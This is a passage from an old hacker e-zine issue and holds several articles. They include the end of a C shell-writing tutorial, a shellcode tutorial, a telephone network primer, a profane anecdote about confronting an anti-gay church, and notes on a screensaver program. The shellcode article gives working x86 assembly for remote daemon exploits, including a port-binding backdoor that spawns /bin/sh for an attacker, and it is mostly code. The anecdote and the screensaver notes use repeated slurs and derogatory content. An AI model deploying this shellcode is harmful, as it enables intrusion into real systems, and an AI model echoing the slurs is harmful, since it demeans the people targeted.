char *infile; char *outfile; if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1) printf("Incorrect input redirection\n"); else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1) printf("Incorrect output redirection\n"); else if (redirect(infile, outfile) == -1) printf("redirection failed!@#$\n"); else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) { if(execvp(rargv[0], rargv) == -1) printf("Invalid command\n"); } exit(1); } --------------------------EOF--------------------------------------------- Change the execthecommand() in bsh v2.0 to the one I modified for redirection support. Let's take a look at our final shell. --------------------------bsh v3.0-------------------------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; char *infile; char *outfile; if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1) printf("Incorrect input redirection\n"); else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1) printf("Incorrect output redirection\n"); else if (redirect(infile, outfile) == -1) printf("redirection failed!@#$\n"); else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) { if(execvp(rargv[0], rargv) == -1) printf("Invalid command\n"); } exit(1); } void main(void) { char input[MAX_CANON]; pid_t child_pid; while(1) { fputs(PROMPT_STRING, stdout); if (fgets(input, MAX_CANON, stdin) == NULL) break; if(*(input + strlen(input) -1) == NEWLINE_SYMBOL) *(input + strlen(input - 1) = 0; if(strcmp(input, QUIT_STRING) == 0) break; else { if ((child_pid = fork()) == 0) { execthecommand(input); exit(1); } else if(child_pid > 0) wait(NULL); } } exit(0); } ------------------------------EOF-------------------------------------- Redirection is the last feature we are going to put in our shell. Unfortunatley, I was busy as hell getting b4b0 7 together, and I didn't have much time to add support for pipes, background processes, jobcontrol(allows a user to move the foreground process group into the background, and vice versa), or most of the other things that a good shell features. This was merely for your learning and enjoyment. Hope you gained something out of it. Feel free to look up the functions in b4b0shell.h that we didnt use, and extend onto your shell. Bye. HEH!@#$ ph1x@b4b0.org -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- The Art of Making Shell Code, by smiler -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Hopefully you are familiar with generic shell-spawning shellcode. If not read Aleph's text "Smashing The Stack For Fun And Profit" before reading further. This article will concentrate on the types of shellcode needed to exploit daemons remotely. Generally it is much harder to exploit remote daemons, because you do not have many ways of finding out the configuration of the remote server. Often the shellcode has to be much more complicated, which is what this article will focus on. I will start by looking at the ancient IMAP4 exploit. This is a fairly simple exploit. All you need to do is "hide" the /bin/sh" string in shellcode (imapd converts all lowercase characters into uppercase). None of the instructions in the generic shell-spawning shellcode contain lower-case characters, so you all you need do is change the /bin/sh string. It is the same as normal shellcode, except there is a loop which adds 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so even beginners can understand it. Sorry to all those asm virtuosos :] -----imap.S------- .globl main main: jmp call start: popl %ebx /* get address of /bin/sh */ movl %ebx,%ecx /* copy the address to ecx */ addb $0x6,%cl /* ecx now points to the last character */ loop: cmpl %ebx,%ecx jl skip /* if (ecx Most syscalls in linux x86 are done in the same way. The syscall number is put into register %eax, and the arguments are put into %ebx,%ecx and %edx respectively. In some cases, where there are more arguments than registers it may be necessary to store the arguments in user memory and store the address of the arguments in the register. Or, if an argument is a string, you would have to store the string in user memory and pass the address of string as the argument. As before, the syscall is called by "int $0x80". You can potentially use any syscall, but the ones mentioned above should just about be the only ones you will ever need. As an example heres a little shellcode snippet from my wu-ftpd exploit that should execute setuid(0). Note: you should always zero a register before using it. ---setuid.S---- .globl main main: xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */ movl %ebx,%eax /* zero out the %eax register */ movb $0x17,%al /* set the syscall number */ int $0x80 /* call the interrupt handler */ --------------- Port-Binding Shellcode When you are exploiting a daemon remotely with generic shellcode, it is necessary to have an active TCP connection to pipe the shell stdin/out/err over. This is applicable to all the remote linux exploits I've seen so far, and is the preferred method. But it is possible that a new vulnerability may be found, in a daemon that only offers a UDP service (SNMP for example). Or it may only be possible to access the daemon via UDP because the TCP ports are firewalled etc. Current linux remote vulnerabilites are exploitable via UDP - BIND as well as all rpc services run both UDP and TCP services. Also, if you send the exploit via UDP it is trivial to spoof the attacking udp packet so that you do not appear in any logs =) To exploit daemons via UDP you could write shellcode to modify the password file or to perform some other cunning task, but an interactive shell is much more elite =] Clearly it is not possible to fit a UDP pipe into shellcode, you still need a TCP connection. So my idea was to write shellcode that behaved like a very rudimentary backdoor, it binds to a port and executes a shell when it receives a connection. I know for a fact that I wasn't the first one to write this type of shellcode, but no one has officially published it so...here goes. A basic bindshell program(without the style) looks like this: int main() { char *name[2]; int fd,fd2,fromlen; struct sockaddr_in serv; fd=socket(AF_INET,SOCK_STREAM,0); serv.sin_addr.s_addr=0; serv.sin_port=1234; serv.sin_family=AF_INET; bind(fd,(struct sockaddr *)&serv,16); listen(fd,1); fromlen=16; /*(sizeof(struct sockaddr)*/ fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); /* "connect" fd2 to stdin,stdout,stderr */ dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]=NULL; execve(name[0],name,NULL); } Obviously, this is going to require a lot more space than normal shellcode, but it can be done in under 200 bytes and most buffers are quite a bit larger than that. There is a slight complication in writing this shellcode as socket syscalls are done slightly differently than other syscalls, under linux. Every socket call has the same syscall number, 0x66. To differentiate between different socket calls, a subcode is put into the register %ebx. These can be found in . The important ones being: SYS_SOCKET 1 SYS_BIND 2 SYS_LISTEN 4 SYS_ACCEPT 5 We also need to know the values of the constants, and the exact structure of sockaddr_in. Again these are in the linux include files. AF_INET == 2 SOCK_STREAM == 1 struct sockaddr_in { short int sin_family; /* 2 byte word, containing AF_INET */ unsigned short int sin_port; /* 2 byte word, containg the port in network byte order */ struct in_addr sin_addr /* 4 byte long, should be zeroed */ unsigned char pad[8]; /* should be zero, but doesn't really matter */ }; Since there are only two registers left, the arguments must be placed sequentially in user memory, and %ecx must contain the address of the first. Hence we have to store the arguments at the end of the shellcode. The first 12 bytes will contain the 3 long arguments, the next 16 will contain the sockaddr_in structure and the final 4 will contain fromlen for the accept() call. Finally the result from each syscall is held in %eax. So, without further ado, here is the portshell warez... Again I've over-commented everything. ----portshell.S---- .globl main main: /* I had to put in a "bounce" in the middle of the code as the shellcode * was too big. If I had made it jmp the entire shellcode, the instruction * would have contained a null byte, so if anyone has a shorter version, * please send me it. */ jmp bounce start: popl %esi /* socket(2,1,0) */ xorl %eax,%eax movl %eax,0x8(%esi) /* 3rd arg == 0 */ movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */ movl %eax,0x10(%esi) /* zero out sock.sin_addr */ incb %al movl %eax,%ebx /* socket() subcode == 1 */ movl %eax,0x4(%esi) /* 2nd arg == 1 */ incb %al movl %eax,(%esi) /* 1st arg == 2 */ movw %eax,0xc(%esi) /* sock.sin_family == 2 */ leal (%esi),%ecx /* load the address of the arguments into %ecx */ movb $0x66,%al /* set socket syscall number */ int $0x80 /* bind(fd,&sock,0x10) */ incb %bl /* bind() subcode == 2 */ movb %al,(%esi) /* 1st arg == fd (result from socket()) */ movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */ addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */ movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */ movb $0x23,0xe(%esi) /* set sin.port */ movb $0x66,%al /* no need to set %ecx, it is already set */ int $0x80 /* listen(fd,2) */ movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */ incb %bl /* no need to set 1st arg, it is the same as bind() */ incb %bl /* listen() subcode == 4 */ movb $0x66,%al /* again, %ecx is already set */ int $0x80 /* fd2=accept(fd,&sock,&fromlen) */ incb %bl /* accept() subcode == 5 */ movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */ addb $0xc,0x4(%esi) /* increase it by 12 bytes */ movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */ addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */ movb $0x66,%al int $0x80 /* KLUDGE */ jmp skippy bounce: jmp call skippy: /* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */ movb %al,%bl /* move fd2 to 1st arg */ xorl %ecx,%ecx /* 2nd arg is 0 */ movb $0x3f,%al /* set dup2() syscall number */ int $0x80 incb %cl /* 2nd arg is 1 */ movb $0x3f,%al int $0x80 incb %cl /* 2nd arg is 2 */ movb $0x3f,%al int $0x80 /* execve("/bin/sh",["/bin/sh"],NULL) */ movl %esi,%ebx addb $0x20,%ebx /* %ebx now points to "/bin/sh" */ xorl %eax,%eax movl %ebx,0x8(%ebx) movb %al,0x7(%ebx) movl %eax,0xc(%ebx) movb $0xb,%al leal 0x8(%ebx),%ecx leal 0xc(%ebx),%edx int $0x80 /* exit(0) */ xorl %eax,%eax movl %eax,%ebx incb %al int $0x80 call: call start .ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh" ----------------------------------------------------- Once you have sent the exploit, you only need to connect to port 8960, and you have an interactive shell. ----------------[ FreeBSD shellcode Just in case all of that was all old hat to you, I'll take a little foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most ways completely different. Primarily because syscalls are done by pushing arguments onto the stack and using a far call. The syscall number still goes in the %eax register however. OpenBSD is much the same but it uses an interrupt for syscalls. The main complication in writing shellcode for FreeBSD is in the far call (instruction lcall 7,0) which contains 5 null bytes. Obviously you would need to write some basic self-modifying shellcode. Since this is going to be used in every syscall you make, its best to put this into a mini-function and call it whenever necessary. I wrote a little template for this, it's easy enough to make it execute a shell or bind to a port. Just incase you're wondering the syscall for execve is 0x3b. ----fbsd.S---- .globl main main: jmp call start: /* Modify the ascii string so it becomes lcall 7,0 */ popl %esi xorl %ebx,%ebx movl %ebx,0x1(%esi) /* zeroed long word */ movb %bl,0x6(%esi) /* zeroed byte */ movl %esi,%ebx addb $0x8,%bl /* ebx points to binsh */ jmp blah /* start the code */ call: call start syscall: .ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */ ret binsh: .ascii "/bin/sh...." blah: /* put shellcode here */ call syscall -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- The Telephone System/Network Part 1, by pabell -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- THE TELEPHONE SYSTEM OR NETWORK This paper was written mainly because of the lack of real information kicking around on and off the net about phone systems and networks. This is part one, of a two-part primer on phone systems. This is a very introductory paper. I don't go into great detail, but cover the basics and a first look at phone networks and systems. If you really haven't been exposed to the telephony industry, this paper, may be ominous. For the purpose of this paper I have broken the telephone network into three basic components. 1. THE CENTRAL SWITCHING MACHINE 2. THE OUTSIDE PLANT FACILITIES 3. THE INSIDE PLANT FACILITIES In this paper we will look at each of the three sections. Section three the INSIDE PLANT FACILITIES will be covered in detail throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT FACILITIES sections of the telephone network will be explained briefly in general terms. Most of the parts of the telephone system or network will already be familiar to you even without realizing it. You have a phone of some description in your home or office, which is part of the INSIDE PLANT FACILITIES section of the telephone network. The INSIDE PLANT FACILITIES consists of all the cable, hardware, telephone sets or equipment in the building or between buildings on the same piece of property. The part of the network, which connects buildings of various shapes and descriptions together, is called THE OUTSIDE PLANT FACILITIES. Poles and associated wires are the only type of outside plant distribution system in use today. The remaining part you may not know about, or at least think you don't know about, is the Central Switching Machine. The basic telephone circuit is Two Wire Circuit, which connects every telephone set, through the Outside Plant Facilities to a Central Switch. This two-wire circuit is usually referred to as a "pair". One wire of the pair is referred to as the TIP and the other wire is the RING. THE CENTRAL SWITCHING MACHINE The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all the individual two wire circuits or spokes are connected. This may sound pretty complicated, but it really isn't. The central switch monitors your telephone circuit and gives you a dial tone when you lift the telephone set off the cradle. Taking a telephone handset off the cradle is referred to as going "off-hook". Off-hook is a very common phrase, and you will hear it in later parts of this paper. When you dial, the Central Switch registers the digits dialed, and identifies the circuit of the party you are trying to reach. The Central Switch then connects your two-wire circuit to the party you dialed. The two telephone sets, which are connected together by the Central Switch, are referred to as the "calling" and "called" parties. The Central Switch the sends a ringing voltage out to the called party, which rings the set bells to identify an incoming call. When the called party goes off-hook, the Central Switch recognizes the off-hook condition, and stops sending the ringing voltage, the two parties then converse. When the calling party dials a number of a telephone circuit which is already in use, or "busy", the Central Switch recognizes the busy condition, and returns a busy tone to the calling party. So, as you can see, the Central Switch isn't really unfamiliar to you. You have interacted with, and experienced many of the operations it performs. There are many types of Central Switching Machines in use throughout the telephone industry today. Each switch has it's advantages, and features, however all systems provide the basic functions which were briefly described. To review, the main parts of the Telephone Network I have described so far are: 1. THE CENTRAL SWITCHING MACHINE 2. THE OUTSIDE PLANT FACILITIES 3. THE INSIDE PLANT FACILITIES Let's backtrack briefly to the Outside Plant Facilities section of the network. Obviously, it would be too difficult to take each seperate two-wire circuit, individually back to the Central Switch. Consequently, numerous two wire circuits or pairs from a common area are bound together in a common covering, or sheath. These groups of pairs enclosed by a common sheath are referred to as cable. The actual number of pairs in a cable or the size of cable can vary from one pair, to hundreds of pairs dependent upon how many circuits the cable must service. As was mentioned previously, all the cables servicing locations leave the Central Switch in different directions according to the route, which will be the most cost effective, and can effectively, service people in the area. The cables, which leave the Central Switch, are very large, but as the cable goes along it is continually decreasing in size, as smaller cables are dropped off at locations where they are needed. The smaller cables branch out from the main cables, and these cables again branch out to smaller cables until every building and place is reached. There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone. 1. AERIAL CABLE 2. UNDERGROUND CABLE 3. FIBER OPTIC CABLE Let's briefly look at each of the types of Outside Plant Facilities. Aerial Cable As the name aerial cable would indicate, the cable, and terminals are supported above the ground on poles. The Aerial Cable distribution system is probably the one you are most familiar with, since it was the first system utilized across North America. The poles and wire are still visible throughout this country today, and in many cases, is still the most cost-effective method, where underground cabling is physically impossible. The diagram would be typical of a single line residential building application of an Aerial Outside Plant System. You may see the term "terminal" in the diagram. Terminals are simply access points placed at convenient locations, on or between poles, along the cable route to permit connections to selected pairs in the cable. For example, a cable consisting of 100 pairs might have a terminal mounted on the pole to allow a technician access to pairs 1-25. The next terminal would allow access to pairs 24-40, and so on, until all the pairs have been used. In this manner, the pair assigned to each building, at the Central Switch, can be accessed at the closest terminal to that particular building. The individual buildings aerial "drop wire" is then connected to the pair in that terminal. Underground Cable The underground cable distribution system is very similar in design to the aerial cable system. I consider underground cable to be both, DIRECT BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS. As the title Direct Buried would indicate, the cable is placed into the ground, with no protection other than the inherent protection provided by the cable composition. Underground Conduit Systems for cable, are used to provide an out of sight cable system and to provide a means of adding to the existing cable as service demands increase. Underground Conduit Systems also provide protection for the cables since the cables are inside a pipe, which shields the cable. The Underground Cable Distribution System is configured similarly to the aerial cable, in that, cables leave a central point and continually branch out to smaller cables until all the buildings etc. have been accommodated. The Underground System is connected to buildings in basically two ways. PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access points where building cabling can be connected to the cable from the Central Switching Machine. There are many types, sizes, and shapes of pedestals in use today. The following diagram is a simplified depiction of the underground cable (drop wire) from a building premise, which has been buried, to a pedestal for connection. Encapsulation is when the buildings drop wire is permanently spliced into the underground distribution system. This system is preferred in situations where the visible pedestals are not appropriate, or possible. Fiber Optic Transmission Systems In the aerial and underground cable distribution systems looked at earlier, a pair of copper wires is used to carry the electrical signals generated by the transmitting buildings phone, to the switching machine, and then ultimately, to the receivers phone. The mouthpiece (transmitter) of the telephone converts the acoustic voice message into corresponding electrical signals. The electrical signals are passed onto the receiver's earpiece (receiver) where they are converted back to the original acoustic voice message. In certain cases now, it is becoming uneconomical to provide a pair of wires from every customer phone to the central switch. Transmitting speech and information via glass fibers instead of the conventional copper wire methods previously described is becoming increasingly popular in high traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and more prevalent in the communication industry. "FOTS" is the short term for Fiber Optics Transmission System. The development of FOTS technology has been increasing dramatically in recent years. The transmitting buildings phone still generates the same electrical signals, but the signals are used to turn a light source on and off. The light travels down the glass fibers where it is received and converted back to electrical impulses, which are connected to the receiving customers to wire copper pair. To get a perspective of the comparison of a pair of copper wires to a pair of glass fibers, consider the number of independent connections, which are possible on each type of system. * A pair of copper wires will provide two way communications for one conversation. * A pair of glass fibers can provide up to 8000 independent connections. The demands for more and more facilities to transmit and receive information is becoming increasingly rapid. The cost and limitations of traditional means of linking areas together, is becoming more apparent. The normal cable distribution systems in use throughout the telephone industry employs combinations of underground, aerial, and FOTS distribution systems, to provide the most cost efficient, and effective means of providing service. There is your basic introduction to the telephone network or system. As my series of phone networks goes on I will go into greater detail and explain some of its more complex issues and attributes. Pabell pabell@comtech.ab.ca -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- How I literally got kicked out of the Eastern Baptist Church, by schemerz -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Disclaimer: Incidents included are all fictionious in nature due to the shady recollection process after smoking a little bit too much hash. These incidents were funny, at least as I remember it. These accounts are somewhat factual, somewhat not, so I decided just to change the names and make it safe in case I get anything horribly wrong. Eastern Baptist Church is located in Topuka, the capital of the state Kansas. It's not a really big church, but they get in the news alot. Most of the time they leave their tact at home and picket funerals and concerts, most recently the funeral of Math ew Sheppard. (I think they are too chicken to picket the rob zomebie and korn concert in KC last night, kick ass concert btw, but that's another article... :) They are also responsible for web sites such as www.goddetestsfags.com. So they are really a fun bunch. Rush Limbough would have been proud. Reverend Fred Felps heads the crowd, who was a lawyer in a previous life, until one of his sons got out of the closet. Fred Felps then runs to the nearest Warmart to purchase a really bad white robe and calls himself a preacher. After being thrown out o f the Southern Baptist Church because of his faggot hating ways, he started his own church, the Eastern Baptist Church, which basically runs out of his own house along with 20-30 family members and close friends. They get supported by a lot of white powe r parties too. Although not all of the family is predominantly prejudgice, I have had the pleasure of meeting his grandson, Ben Felps, who happens to be a graduate student doing computer science at University of Kansas. Ben admins most of his granddaddy 's sites, including of course yours truly. Enough with the background. I have to explain why I had the urge of seeing one of these sermons of Fred, if not fucking it up and causing some serious mayhem: Almost 3 years ago I arrived in Kansas fresh off the boat, as they would say afer having a less than stellar high school career somewhere in South East Asia. Shortly after arriving into the university and being shipped off to this smelly little dorm room , I was introduced to Sam my new roomate. He drove me around, showing me stuff and I got to know him very well. We were just kicking it one weekend in september and started watching the tele, when channel 6 was doing a special of a concert held at a loc al community college. Turns out this composer was dying of AIDS, and someone was holding a concert in his name for being the talent as he is. (I can't remember this dood's name, but I remember listening to some of his stuff on the local university radio now. Truly a talent.) Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death," "Gay=Death of Ethics=Death of America," and of course, "God detests fags!". I was thoroughly bewildered at the sight of such signs, and proceeded to bug Sam about it. Shit like this at home just does not fly. It's not like asians have a strong tolerance of homosexuals or racial diversity, but they keep it to themselves and have the politeness to withhold their opinion at times of mourning, such as a concert displaying ones work as one dies of aids. Being the fuckwit 18 year old that I was, I suggested to Sam that we would head over and see one of their sermons and check out their reasoning, because neither of us can make any logical sense out of Fred's websites. So we called the church up, asked if it was an open sermon coming up. We stated that we weren't gonna cause trouble, and putting on my fakeist british accent, asked if we could attend. We were of co urse declined the opportunity, since it was a close church. Being the dumb motherfucker sam can be sometimes, we decided to crash the party instead. (He's getting married to the least sensible woman on this planet in a month, so WATCH OUT FOR DA KIDS) So we hoped into his girlfriends car (btw we chatted this woman up no more than one week before, and now three years latter sam is fucking marrying the woman... good god... time has past QUICKLY... oh and she lent him the car... Megan is so fucking co ol, prolly cause Sam is such a fucking pimp), and drove to Topuka. We arrived at the church shortly before the sermon begun, and walked in, saying we are looking for Ben. Ben came out shortly, trying to cover his blood soaked ass, saying that his grandd ad was holding a sermon. We talked abit, commenting a little about the upside down american flag hanging outside the church. He said he would attend to us shortly after the sermon. I put on the largest puppy dog eyes I could muster, and asked *very* po litely if I can attend the sermon. Since he was a ta in one of my computer science lab classes, he was sure I wasn't going to pull any shit. We got in, sat on a seat. The living room was packed, and Sam was kinda chickening out a little... "Maybe we shon't be here dood..." Little did I know he was one of the most articulate argurers I was ever gonna meet :) So the sermon went, the usual ch urch shit, yahdayahdayahda... the hymes, the prayers and all that... until about 45 minutes latter Sam woke me from deep slumber when Fred started preaching the evils of homosexuality. People started asking questions as he spoke, and he answered quite logically. The man was a lawyer I thought, most of them, like my dad, have a knack of conveying one side of reasoning and made it all encompassing. So I held up my hand, to which I was asked to speak. "Reverend Felps, I am new here, in this church and in this country. I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita then most other minorites, b) are probably more educated as well ? How can any group contributing to the government and society in such a way be considered harmful ?" He muttered something ridiculous like telling me to get a haircut, which was when Sam (he's got hair down to his ass... I learned never ever to talk any shit about long hair around him) stood up and started his rhetoric :)... "Mr Felps, I would like to know why you are so proliferic about your projections on to gay people. It is quite entertaining, humorous even, that you would chose to broadcast your inner id feelings towards homosexuals on national television. " Most people got the joke, and gave us the evilest look they could muster. I must say most people would have backdowned and shut up at this point, but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he did not know what Sam meant. Sam : "Mr Felps, would you like to answer my friends question as to why you are targeting one of the more successful groups of minorites of this country ?" Felps : "I happen to think their lifestyle is a harmful influence to our youth in this country. I also happen to percieve that this country is being overran by faggots. Is there no more decency in this country ?" (applause by his crowd) "Mr Felps, as I recall correctly, the american society is firmly capitalist, meaning that each individual's success is based upon one's wealth. how would the lifestyle of a homosexual, one of success, good education and wealth be questionable to the yout h? " Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN based. It is because of non-believers such as these homosexuals, that the youth today stem from the faith. That, is why I am opposed to them." Me : "But was it not in the new Testament itself that states that we should love our neighbours ?" Felps : "Ummmmm... Are you familiar with the book of Sodom ?" Sam : "Yes I am, and I am familiar with this line of arguement. You would state that the book of sodom states quite clearly that male-male sexual activites are forbidden and the only male-female copulation is deemed allowable by god. You would also stat e that the bible FIRMLY states that sex is a sacred act of god, and people should not abuse this power. You will also lead into the argument right here that AIDS and other sexually transmitted diseases was the repricusion of these acts." Felps : "You read my mind son. How would you chose to refute these claims. I am of course a man binded by faith, so please keep any arguements of the bible's validity to yourself. " Sam : "Okay... Homosexuality has been documented long since roman times. How come aids were to come around now?" Felps : "There are other sexual transmitted diseases that god has dispensed in his fury upon this planet. Unfortunately the devil has made the faggot strong in his ways, and they have not been disuaded." Me : "How about this ? It is nearly medically impossible for lesbians to contract aids. If god indeed try to make AIDS as a means of disuading homosexuality, why are a) more hetrosexuals affected ? b) why did he leave half the faggots off the list ? " Felps : "God is not fair, he chose to punish the whole of humanity for the crimes of the faggots. I have taken up the task of god to disuade all of humanity against the ways of faggots. Lesbians are evil too." One of us : "You still have not answered the questions we posed, could you please answer them now ? " Felps : "I have answered them son. God has other diseases to weaken his enemy. Aids is only one piece in his arsenal. Gonoerrha, syphillis, etc etc all attack sexually indecent men and women in some way or another." One of us : "Alright fair enough, how about this... If a person who is not sexually promiscous, then it is very unlikely that he or she gets infected with anything correct ? Is it possible that your god wants to disuade his people away from promiscious sex ? Has he not made a distinction between acts of love and acts of passion before ?" Felps :"God has made it very clear that sexual acts outside of wedlock are forbidden. " Me :"Mr Felps, where does it exactly in the bible say that wedlock has to between a man and a woman ?" Felps : (stammers some unintelligible... me and sam exchange evil grinning looks...) Me : "As a matter of fact, where in the bible does it define the man and the woman entity, biologically and psychologically ? If this premise is not made, then all your arguements against homosexuality is up to question." Someone in the crowd : "How is that ?" Sam : "Well it is quite easy to see that a gay couple can be enacting both the male and female parts of the relationship. With legislation allowing homosexuals to marry in Hawaii it is perfectly ethical for gays to be in bounds of christianity and still copulate. No ?" Someone in the crowd : (something like you fags or faggot loving liberals... something dumb like that... think it was Ben. ) Someone else in the crowd : (Leave if you don't like what we have to say, We don't like you anyways.) Sam : "We are merely discussing the rhetoric in the bible, I personally made no attacks towards the validity of the good book, neither did my friend here. " Some bitch in the crowd : "Shut up you people are full of it as it is!" Me : "We were merely discussing with the *beloved* reverend the various interpreations of the bible over a fine comb." We were asked to leave anyways :) In fact, we didn't leave quite yet until Sam got his answers from his questions. Sorely to say we were rather discouraged with our journey towards the interpretations of the bible. I personally ditched the cross and became a taoist instead. Oh well... Fred was beaten up in the middle of Kansas City one day when he was picketing somewhere near the Plaza. HEH it was a sight to behold. He's wrong. I am right. HAHA -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- bsaver overview, by cp4kt -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- This little program, based off of Qytpos drugz2.c, has been turned into a lovely ncurses screen saver. Nice words, derogatory words, and most importantly; dill monkey words come up -- It's fun for the whole family. We / I decided to just store the password in this line here. static char passwd[] = "dillmonkey" ; If you can code just a teeny bit, you can change this to a macro. Did I mention teeny? We also thought that perhaps you might want to accept a password via something prompting for a password at each session. Such might be accomplished by: static char passwd[20]; ... printf("Enter password to use: "); sscanf("%20s", passwd); But the problem is if you forget, you might as well reboot. Also, you can have it saved in perhaps a file .bsaver and open, fgets() from it, but remember the character length has to be 20! You can also merely use the passwd structure and use your login password via crypt() etc. Anyways, the code is yours to edit. If there is any problems, mail me at comp4ct@hotmail.com p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt. NOTE: If you have any minorities in your office / household, i would not run this program in front of them. It make lock your console, but if they see whats popping up, you could be fired / flogged. But isn't that the b4b0 way? Good Day, cp4kt Special thanks to: Matt Conover (Shok of w00w00) for his great article on console ioctls. The macros used to lock console were taken from there. Thank you. -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- Closing up.. WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extraoridinary diverse issue of BABO! Please send many submissions to us for B4B0 8 (submissions@b4b0.org). Comments and questions go to: letters@b4b0.org Your editor, ph1x. ######## ######## ######## ## ## ## ## ######## ## ## ######## ## ## ## ## ######## ######## ##